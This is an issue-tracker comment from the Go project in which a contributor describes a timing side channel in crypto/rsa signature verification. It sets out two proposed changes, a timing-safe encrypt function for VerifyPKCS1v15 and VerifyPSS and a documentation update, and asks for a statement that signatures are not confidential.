I have updated my PR with my current fix (CL 581855). This fix introduces a timing-safe encrypt function in addition to the existing encrypt, and changes VerifyPKCS1v15 and VerifyPSS to use this timing-safe encrypt while leaving the functions not impacted by this timing channel to use the current encrypt.

Here are the measurements for VerifyPKCS1v15 with this fix (before-and-after graph of the timing channel for VerifyPKCS1v15) and for VerifyPSS with this fix (before-and-after graph of the timing channel for VerifyPSS).

Based on the prior discussion, it seems unlikely this fix (CL 581855) will be merged. I have created a PR (CL 583304) with comments updating the erroneous documentation.

I have no objection to resolving this issue after:

  1. CL 581855 (the fix) is merged,
  2. or CL 583304 (documentation fix) is merged,
  3. or another party updates the documentation.

I don't plan to do any more work on this unless something changes.

I would like to collect statements from RSA libraries, including the golang crypto package, stating that signatures are not considered confidential. Such statements would be useful to make the case that OIDC should not expect signatures to be treated as confidential. If you could make such a statement in the official documentation of this project, that would be very helpful.

@gopherbot

Change https://go.dev/cl/583304 mentions this issue: crypto/rsa: documents timing leaks in rsa package
